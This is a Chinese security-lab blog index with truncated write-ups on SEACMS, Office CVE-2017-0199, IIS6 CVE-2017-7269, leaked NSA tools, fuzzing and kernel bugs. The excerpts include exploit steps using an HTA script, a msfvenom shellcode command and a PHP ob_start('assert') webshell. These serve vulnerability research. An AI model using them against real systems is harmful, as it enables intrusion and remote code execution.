海洋CMS(SEACMS)v6.55执行任意代码漏洞及其补丁绕过方法

概述

最近我们的一名安全托管客户反应,其服务器遭受到攻击,被黑客上传了webshell并篡改网页内容。经过我们为客户安装云锁防护软件后,拦截到一个针对海洋CMS(SEACMS)的0day漏洞。
海洋CMS是一套专为不同需求的站长而设计的视频点播系统,在影视类CMS中具有很高的市场占有率,其官方地址是:http://www.seacms.net/

海洋CMS(SEACMS)几个老漏洞及其修补方法

在2017年2月,海洋CMS 6.45版本曾爆出一个前台getshell漏洞,漏洞具体内容参见:http://blog.csdn.net/qq_35078631/article/details/76595817。该漏洞成因在于search.php没有对用户输入内容进行过滤,导致攻击者提交的order参数可进入parseIf函数中执行eval。
官方在6.46版中修复了该漏洞,修复方法是对用户输入的参数进行过滤并限制长度为20个字符。但这种修复方法并没有完全修复漏洞,因为在替换操作过程中用户输入的几个参数可以进行组合,因此补丁被绕过。
随后官方又在8月7日发布了6.54版本再次修复漏洞,这次修复增加了一句:

$order = ($order == "commend" || $order == "time" || $order == "hit") ? $order : "";

即限制了order参数只能是固定内容,这样虽然避免了通过order参数进行的攻击,但是却没有解决其他参数进入parseIf函数的问题。

海洋CMS(SEACMS)0day漏洞分析

我们抓取到的攻击payload如下:

POST /search.php HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 
阅读全文
Posted on 十月 17, 2017 at 下午4:29 by admin · Permalink · Comments Closed
In: Web安全

NSA方程式Easybee攻击程序漏洞复现与分析

作者:天择实验室wuhj@jowto.com
转载请注明出处:http://blog.jowto.com

影子经纪人(Shadow Brokers)最近曝光的NSA方程式Windows攻击程序中有一个针对Mdaemon邮件服务器漏洞的远程攻击程序——Easybee,本文将对Easybee漏洞攻击进行复现,并分析漏洞攻击原理。

环境搭建

Easybee是针对Mdaemon邮件服务器远程逻辑漏洞的攻击程序,它支持对下列版本的Mdaemon服务器进行攻击:

我这里找到一个10.1.1版本的Mdaemon进行测试,首先需要两台测试机:

在靶机上的Mdaemon中添加域名testeasybee.com,由于这个域名并没有在互联网上注册,所以我们自己搭建一个DNS服务器,把testeasybee.com的MX记录设置为192.168.1.105,并在192.168.1.3中设置DNS服务器为我们自己的DNS。然后在Mdaemon的testeasybee.com域名中新建用户admin@testeasybee.com,密码Aa654321。

漏洞利用复现

在攻击机192.168.1.3中运行Fuzzbunch攻击框架,设置Target IP为192.168.1.105,Callback IP为192.168.1.3,Redirection为no。 e1.PNG

新建Project设置一些log目录之类的常规参数,然后运行Easybee,设置攻击参数: e2.PNG

具体攻击参数的意义为:

TargetIp —— 目标IP地址,这里是192.168.1.105

TargetWCPort —— … 阅读全文

Posted on 六月 14, 2017 at 下午4:15 by admin · Permalink · Comments Closed
In: 漏洞分析

CVE-2017-0199 OFFICE OLE2LINK漏洞利用详解

作者:天择实验室wuhj@jowto.com
转载请注明出处:http://blog.jowto.com

漏洞概述

fireeye最近公布了一个OFFICE 0day,在无需用户交互的情况下,打开word文档就可以通过hta脚本执行任意代码。经过研究发现,此漏洞的成因主要是word在处理内嵌OLE2LINK对象时,通过网络更新对象时没有正确处理的Content-Type所导致的一个逻辑漏洞。

漏洞利用方法

首先准备一台apache服务器,web根目录下保存一个1.rtf文件,内容如下:

test789
<script>
var objShell = new ActiveXObject("wscript.shell");
objShell.Run("%SystemRoot%\\system32\\calc.exe");
</script>

确保apache配置文件conf/mime.types里面有rtf的content type项:

application/rtf                 rtf

用word生成一个空白文档,然后在其中插入一个对象。

选择由文件创建,输入web服务器上1.rtf的URL,一定要选上“链接到文件”:

这时候会生成一个有test789文字内嵌对象的文档,这是双击该对象只能以rtf文件方式打开对象,并不能执行hta脚本。因为生成对象的时候选中“链接到文件”,所以当打开对象的时候会去服务器上请求http://192.168.1.108/1.rtf来更新对象内容。

此时在apache配置文件conf/mime.types中把

application/rtf                 rtf

修改成:

application/hta                 rtf

重启apache后,清除IE缓存:

再双击对象,此时虽然访问的还是1.rtf文件,但是服务器的Content-type会返回application/hta,而word就以hta脚本的方式打开文件:

这样的poc还是需要用户双击对象进行交互的,那么怎么样才能自动运行对象呢?这里就需要把文件保存成rtf格式:

用文本编辑器打开刚保存的rtf文件,找到object标签所在的地方:

{\object\objautlink\rsltpict

修改成:

{\object\objautlink\objupdate
阅读全文
Posted on 四月 17, 2017 at 下午2:01 by admin · Permalink · Comments Closed
In: 漏洞分析

IIS6 ScStoragePathFromUrl溢出漏洞利用方法

作者:天择实验室wuhj@jowto.com
转载请注明出处:http://blog.jowto.com

3月27日华南理工大学的研究人员公布了IIS6的一个栈溢出漏洞(CVE-2017-7269),在2003系统下开启WEBDAV的情况下,可以远程获取Network Service权限。在尝试调试利用此漏洞的时候,我遇到了一些问题并进行了解决,现在把调试和解决方法记录下来作为学习笔记,以便日后总结复习。

漏洞简析

此漏洞出现在httpext.dll的ScStoragePathFromUrl,当发送PROPFIND请求后,IIS会把请求交给WEBDAV的扩展httpext.dll来处理,最终调用到HrCheckIfHeader:

HrCheckIfHeader回去调用CMethUtil::ScStoragePathFromUrl,作用大概是把URL映射到本地文件路径。

在ScStoragePathFromUrl的处理过程中对If头的内容没有正确处理,当出现以If: <http://开头的字符串时,复制过程中会导致栈溢出。

漏洞利用

网上给出此漏洞利用的一个poc:
https://github.com/edwardz246003/IIS_exploit/blob/master/exploit.py
利用三次ScStoragePathFromUrl溢出覆盖到IEcb类的虚函数表,最终在调用httpext!ScStripAndCheckHttpPrefix的时候执行到ROP链,rsaenh.dll中的ROP链最终跳转到shellcode执行。

这里的shellcode会被MultiByteToWideChar处理,所以必须编写能经过UNICODE转换的shellcode,可以使用msfvenom来生成shellcode:

msfvenom -p windows/exec CMD="calc.exe" EXITFUNC=thread -e x86/unicode_mixed BufferRegister=ESI

本来以为到这里漏洞利用很简单就会结束,但是改写exp的时候又遇到了一些问题,因此有了本文。

绕过限制

我用msfvenom生成反向回连的shellcode去替换原有shellcode,发现无法回连CMD SHELL,但是会有连接返回来,在目标机器上查看发现没有启动cmd.exe进程。同样用windows/exec payload启动cmd.exe也无法成功,这就奇怪了,难道IIS对启动进程做了限制?禁止w3wp.exe进程去启动cmd.exe?

后来有人发布了msf下的exp程序,试验却可以返回CMDSHELL,观察后发现msf并非直接启动cmd.exe,而是由w3wp启动notepad.exe,再由notepad来启动cmd.exe。这更证实了我的猜测,IIS对自身所创建的进程有限制,无法直接创建cmd进程。

于是我也改造自己的shellcode,由shellcode先创建一个calc.exe进程,然后把shellcode自身注入到这个进程中,在calc中把cmd.exe复制到其他目录,再由原始shellcode创建cmd副本。我用了TK教主的C语言编写shellcode框架(https://github.com/tombkeeper/Shellcode_Template_in_C),shellcode主要代码部分如下:

void ShellCode(EXTENSION_CONTROL_BLOCK *ecb)  //这里直接用IIS里的ECB控制块,后面解释为什么用这个
{
    struct  KERNEL32    
阅读全文
Posted on 四月 17, 2017 at 下午1:25 by admin · Permalink · Comments Closed
In: 漏洞分析

PHP垃圾回收机制UAF漏洞分析

作者:天择实验室wuhj@jowto.com
转载请注明出处:http://blog.jowto.com

1.PHP垃圾回收机制简介

因为PHP当中存在循环引用,仅以refcount计数器作为垃圾回收机制是不够的,因此在PHP5.3中引入了新的垃圾回收机制。
<?php
$a = array('one');
$a[] = &$a;
unset($a);
?>

在PHP5.2及以前的版本中,无法回收变量$a的内存。

在PHP5.3以后的新垃圾回收机制算法,以颜色标记的方法来判断垃圾:

  1. 将所有数组和对象zval节点放入gcrootbuffer,并标记为紫色(潜在垃圾,已放入缓冲区)。当节点缓冲区被塞满(默认为10000)或调用gccollectcycles()时,开始进行垃圾回收。
  2. 以深度优先对zval及其子节点所包含的zval进行refcount减1操作,并标记为灰色(已减一)。
  3. 再次以深度优先判断每一个节点包含的zval的值,如果zval的refcount等于0,那么将其标记成白色(垃圾)。如果zval的refcount大于0,那么将对此zval以及其子节点进行refcount加1还原,同时将这些zval的颜色变成黑色(正常)。
  4. 遍历zval节点,将C中标记成白色的节点zval释放掉。

垃圾回收算法代码如下:
Zend/zend_gc.c
ZEND_API int gc_collect_cycles(TSRMLS_D)
{
[...]
gc_mark_roots(TSRMLS_C);
gc_scan_roots(TSRMLS_C);
gc_collect_roots(TSRMLS_C);
[...]
/* Free zvals */
p =
阅读全文

Posted on 一月 10, 2017 at 下午3:12 by admin · Permalink · Comments Closed
In: Web安全, 漏洞分析

NSA方程式组织BANANAGLEE工具集分析

作者:天择实验室wuhj@jowto.com
转载请注明出处:http://blog.jowto.com

前段时间黑客团伙“The Shadow Brokers”入侵了美国国家安全局(NSA)旗下的“Equation Group”(方程式组织),并将他们从该黑客组织的计算机系统中所获取到的部分黑客工具泄漏在了互联网上。

这其中包含了一个叫做BANANAGLEE的工具集,它是一个用于植入CISCO ASA和PIX系列设备的非持续控制工具集合(只驻留于内存中,重启后失效),目的是在获取防火墙权限后,能够实现对设备的控制。其中不同的模块用来完成特定的任务,例如流量重定向、流量捕获等。现对其中几个重点模块进行分析。

LP

LP是Listening Post的缩写(在EGBL_AND_BLATSTING.txt等多篇文档中提到了这个名字),它是整个BANANAGLEE工具集的总控制程序,负责连接防火墙、发送控制命令等功能。它的命令行参数用法如下:

Usage for ./lp
--lp Listening Post IP Address
--implant Implant IP Address
--idkey Implant ID Key File
[--lptimeout] Listening Post Timeout Threshold(Optional)
--sport Specify Port to Send Packets From

阅读全文
Posted on 十月 17, 2016 at 下午4:18 by admin · Permalink · Comments Closed
In: 未分类

智能模糊测试工具 Winafl 的使用与分析

作者:天择实验室 haohm@jowto.com
转载请注明出处:http://blog.jowto.com

Winafl(https://github.com/ivanfratric/winafl)是Linux下的智能模糊测试神器afl-fuzz(http://lcamtuf.coredump.cx/afl/)的Windows版本。afl-fuzz从2013年发布到现在,发现了很多真实的漏洞,被广大网络安全从业人员所使用,现在,Windows版本也同样问世,我们同样可以利用它对Windows下的软件进行测试并尝试发现漏洞。
Winafl是一个文件格式及协议漏洞的半自动发现工具,可以帮助我们发现各种使用特定格式文件的应用软件漏洞,如文件编辑软件(doc、xls、pdf等)、图片查看软(bmp、jpg、png等)、视频播放软件(avi、mp4、mpg等)等。
1、编译
Winafl的编译一般情况下不会出现什么问题,过程如下:
可以从https://github.com/ivanfratric/winafl直接下载所有代码的打包文件,也可以使用git for Windows从站点Clone所有代码。下载的代码本身包含编译好的版本,包括32位和64位,你也可以自己编译,这样方便理解、修改和使用Winafl。

阅读全文
Posted on 九月 26, 2016 at 下午2:13 by admin · Permalink · Comments Closed
In: 未分类

解读Linux安全机制之栈溢出保护

作者:椒图实验室
转载请注明出处:http://blog.jowto.com

0x00 概述

栈溢出保护是一种缓冲区溢出攻击缓解手段,当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来让shellcode能够得到执行。当启用栈保护后,函数开始执行的时候会先往栈里插入cookie信息,当函数真正返回的时候会验证cookie信息是否合法,如果不合法就停止程序运行。攻击者在覆盖返回地址的时候往往也会将cookie信息给覆盖掉,导致栈保护检查失败而阻止shellcode的执行。在Linux中我们将cookie信息称为canary(以下统一使用canary)。
gcc在4.2版本中添加了-fstack-protector和-fstack-protector-all编译参数以支持栈保护功能,4.9新增了-fstack-protector-strong编译参数让保护的范围更广。以下是-fstack-protector和-fstack-protector-strong的区别:

参数 gcc支持版本 说明
-fstack-protector 4.2 只为局部变量中包含长度超过8-byte(含)的char数组的函数插入保护代码
-fstack-protector-strong 4.9 满足以下三个条件都会插入保护代码:1.局部变量的地址作为赋值语句的右值或函数参数;2.局部变量包含数组类型的局部变量,不管数组的长度;3.带register声明的局部变量

Linux系统中存在着三种类型的栈:

  1. 应用程序栈:工作在Ring3,由应用程序来维护;
  2. 内核进程上下文栈:工作在Ring0,由内核在创建线程的时候创建;
  3. 内核中断上下文栈:工作在Ring0,在内核初始化的时候给每个CPU核心创建一个。

0x01 应用程序栈保护

1. 栈保护工作原理

下面是一个包含栈溢出的例子:

/* test.c */
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char 
阅读全文
Posted on 三月 2, 2016 at 下午10:31 by admin · Permalink · Comments Closed
In: 内核技术

FltSetSecurityObject引起的Win2003Sp2死锁分析

作者:椒图实验室
转载请注明出处:http://blog.jowto.com

0x00 前言

Minifilter是微软提供的开发Windows文件过滤驱动的一个框架,像安全防护类软件都有用到它。我们在客户的环境里发现了一个由fltmgr导致服务管理器死锁的bug。客户的环境是Win2003 SP2 x64,该服务器上安装了椒图的主机加固产品和某杀毒软件。问题来了,每次杀毒软件更新的时候都会导致服务器黑屏。经过我们排查发现是服务管理器的某个线程在等待杀毒软件的驱动卸载完成,但该线程一直无法完成卸载,好像是死锁了。最后我们找到了FltSetSecurityObject函数导致了死锁。

0x01 FltSetSecurityObject 实现原理

FltSetSecurityObject函数是FltMgr中的一个函数,它用来设置对象的ACL,它的函数原型为

NTSTATUS FltSetSecurityObject(
    IN PFLT_INSTANCE  Instance,
    IN PFILE_OBJECT  FileObject,
    IN SECURITY_INFORMATION  SecurityInformation,
    IN PSECURITY_DESCRIPTOR  SecurityDescriptor);

该函数从Windows 2000就提供了,但是从Windows Vista开始才支持,之前的版本如果调用该函数会返回错误码STATUSNOTIMPLEMENTED表示该Windows版本不支持这个功能。详见MSDN的说明: https://msdn.microsoft.com/en-us/library/windows/hardware/ff544538(v=vs.85).aspx。

我们以Windows 2003 SP2 X86(3790)下的fltmgr.sys(md5:f978277ef786532195cdd9f88e908632)作为分析对象,先看看FltSetSecurityObject函数的实现

NTSTATUS FltSetSecurityObject(
    IN PFLT_INSTANCE  Instance,
    
阅读全文
Posted on 一月 30, 2016 at 下午2:55 by admin · Permalink · Comments Closed
In: 内核技术

ob_start用于菜刀的可行性分析

作者:椒图实验室

转载请注明出处:http://blog.jowto.com

 

传统的ob_start马是这样用:

<?php
ob_start('assert'); 
echo $_REQUEST['pass']; 
ob_end_flush();
?>

经过本人测试这种方法在PHP5.4.X以上版本可以执行代码,但没有任何回显,当然也就不能用于菜刀,那么究竟是什么原因导致的不能回显呢?

分析
ob_start(“assert”)的意思设置assert作为ob操作结束时回调函数,ob_start要求回调函数接收两个参数,而在PHP 5.4.8以下版本assert只接受一个参数,所以5.3.X这样用都不能成功执行代码。恰好本人在做一个基于污点跟踪的webshell监控的玩意,测试这个时候始终不能执行,百思不得其解之后发现是版本问题,汗
5.4.8以上版本的PHP可以成功执行,但是assert执行内容不能有print/echo等ob输出,看PHP源代码找到原因:
main\output.c

PHPAPI void php_end_ob_buffer(zend_bool send_buffer, zend_bool just_flush TSRMLS_DC)
{

    OG
阅读全文
Posted on 一月 4, 2016 at 下午5:22 by admin · Permalink · Comments Closed
In: Web安全
友情链接